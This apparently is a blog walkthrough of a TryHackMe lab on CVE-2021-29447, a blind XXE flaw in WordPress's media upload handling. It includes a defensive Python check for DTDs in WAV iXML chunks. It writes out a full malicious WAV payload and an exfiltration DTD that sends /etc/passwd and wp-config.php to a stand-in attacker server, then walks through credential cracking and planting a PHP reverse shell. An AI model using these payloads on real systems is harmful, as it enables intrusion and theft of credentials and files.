TryHackMe walkthrough — WordPress: CVE-2021-29447

TheBlackAlbum
4 min read · Aug 29, 2021

Overview:

A new vulnerability has been identified in WordPress versions 5.6.0 to 5.7.0 running on PHP 8 by researchers at SonarSource. It is an XXE (XML External Entity) vulnerability that takes advantage of the XML parser's insecure configuration.

A user with the ability to upload files can exploit an XML parsing issue in the Media Library, leading to XXE attacks. WordPress uses the ID3 library to parse the information and metadata of audio files uploaded to the Media Library, and that library was found to be vulnerable to XML External Entity injection. We'll understand this vulnerability further as we walk through the lab.

Exploitation:

Let's start the lab and run wpscan against the target to find out the WordPress version. I like to initially run wpscan with the options below:

wpscan --url <IP> -e p,t,u

We can see that the WordPress version is 5.6.2, which is within the vulnerable range.

We've also been provided with user credentials, test-corp:test, so we can log in and check what this account can do.

Now, since the vulnerability involves uploading a malicious media file, our next step is to create a malicious WAV file (.wav). However, the result of the parsed iXML metadata is not sent back to the user, so to exploit it we need a blind XXE payload. This is doable by including an external Document Type Definition controlled by the attacker.

A DTD defines the document structure as a list of permitted elements and attributes. A DTD can be declared inline inside the XML document, or referenced as an external file.

The command to build the file is given below (the shell quoting is awkward because the single-quoted payload itself needs single quotes around the DTD URL):

echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://YOURSERVERIP:PORT/NAMEEVIL.dtd'"'"'>%remote;%init;%trick;]>\x00' > payload.wav

As you can see, the XML document inside the iXML chunk includes an external DTD at 'http://YOURSERVERIP:PORT/NAMEEVIL.dtd'.
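A defender-side check for the same structure, as an added example that is not part of the original walkthrough: it walks the RIFF chunks of an uploaded .wav, pulls out the iXML chunk that WordPress' ID3 parser would read, and flags any DOCTYPE, ENTITY, SYSTEM or PUBLIC identifier inside it, since legitimate iXML metadata never declares a DTD. The sample files are constructed inline and the attacker URL in the test is a placeholder.

```python
import re
import struct
from typing import Iterator, List, Tuple


def build_wav(ixml: bytes) -> bytes:
    """Wrap an iXML payload in a minimal RIFF/WAVE container (constructed test data)."""
    chunk = b"iXML" + struct.pack("<I", len(ixml)) + ixml
    if len(ixml) % 2:                      # RIFF chunks are padded to an even size
        chunk += b"\x00"
    body = b"WAVE" + chunk
    return b"RIFF" + struct.pack("<I", len(body)) + body


def riff_chunks(data: bytes) -> Iterator[Tuple[bytes, bytes]]:
    """Yield (fourcc, payload) for every chunk inside a RIFF/WAVE file."""
    if len(data) < 12 or data[:4] != b"RIFF" or data[8:12] != b"WAVE":
        raise ValueError("not a RIFF/WAVE file")
    pos = 12
    while pos + 8 <= len(data):
        fourcc = data[pos:pos + 4]
        size = struct.unpack("<I", data[pos + 4:pos + 8])[0]
        payload = data[pos + 8:pos + 8 + size]
        yield fourcc, payload
        pos += 8 + size + (size & 1)       # skip the pad byte on odd-sized chunks


# Markers an XXE payload needs and ordinary iXML metadata never contains.
DANGEROUS = re.compile(rb"<!DOCTYPE|<!ENTITY|SYSTEM\s|PUBLIC\s", re.IGNORECASE)


def find_xxe_indicators(data: bytes) -> List[str]:
    """Return one finding per iXML chunk that carries a DTD or entity declaration."""
    findings = []
    for fourcc, payload in riff_chunks(data):
        if fourcc != b"iXML":
            continue
        hits = sorted({m.group(0).strip().upper().decode() for m in DANGEROUS.finditer(payload)})
        if hits:
            findings.append("iXML chunk declares " + ", ".join(hits))
    return findings


if __name__ == "__main__":
    sample = build_wav(b'<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM "http://attacker.invalid/evil.dtd">%remote;]>')
    print(find_xxe_indicators(sample))
```

A file that trips this check should be rejected before it reaches the metadata parser; the same walk also works on other RIFF containers, since only the chunk name differs.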

Next, we create NAMEEVIL.dtd on our server. It declares the parameter entities that read the target file and send it back to us:

<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=/etc/passwd">

<!ENTITY % init "<!ENTITY &#x25; trick SYSTEM 'http://YOURSERVERIP:PORT/?p=%file;'>" >

The next step is to start an HTTP server in the directory where the .dtd file is saved and upload the .wav file through the Media Library.

As soon as the .wav file is uploaded, the callback request arrives at our HTTP server, with the encoded file contents in the p parameter.

Note that, to exfiltrate the data reliably in a URL, we compressed it with zlib.deflate and then base64-encoded it. To decode it we use the snippet below:

<?php echo zlib_decode(base64_decode('base64here')); ?>

On decoding, we can see the /etc/passwd file content.

Getting the configuration file

Now that we have arbitrary file read, we can try to grab wp-config.php. WordPress is usually installed under /var/www/html, so we update NAMEEVIL.dtd to read /var/www/html/wp-config.php instead of /etc/passwd.

Once again, we will upload the same .wav file and check the request log:

Decoding it gives us the config file, which contains the MySQL credentials.

Once we have the credentials, we can log in to MySQL with them and inspect the database.

From the database named in the config file, we can extract the WordPress user credentials (password hashes).

In order to crack the credentials, I used John.

Once this is done, the next few steps are simple. We just need to log in as this user and upload a PHP reverse shell. We can use PentestMonkey's classic PHP reverse shell to gain access to the machine.

I decided to edit the plugin hello.php to hold my reverse shell. After making the changes in the plugin editor, access the reverse shell at the path below:

https://<IP>/wp-content/plugins/hello.php

You can grab the flag in the only user's home directory ;)

Conclusion:

This was a really cool vulnerability identified by SonarSource and a nice room by TryHackMe to explain the concept. As for remediation, this has been fixed in WordPress version 5.7.1 and above.

That's all for this blog, see you all again soon.

TheBlackAlbum

Penetration tester, Red teamer, Metal Head | OSCP | CRTP | eJPT |